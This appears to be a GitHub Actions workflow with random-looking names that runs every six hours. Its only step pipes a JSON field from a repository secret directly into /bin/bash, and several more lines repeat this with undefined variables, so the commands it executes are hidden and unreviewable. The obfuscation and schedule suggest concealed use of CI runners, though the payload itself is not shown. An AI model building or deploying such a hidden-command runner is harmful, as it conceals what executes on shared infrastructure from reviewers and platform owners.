name: examineexact

on:
  workflow_dispatch:
  schedule:
    - cron: '44 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: examineexact
        env:
          spta97185: ${{ secrets.spta97185 }}
        run: |
          echo $spta97185 | jq -r .hhe366 | /bin/bash
          echo $m1972 | jq -r .r0501 | /bin/bash
          echo $pyaix60579 | jq -r .o20 | /bin/bash
          echo $y20 | jq -r .u02735 | /bin/bash
          echo $xf25 | jq -r .ohhn705 | /bin/bash
          echo $i0 | jq -r .iwod1 | /bin/bash

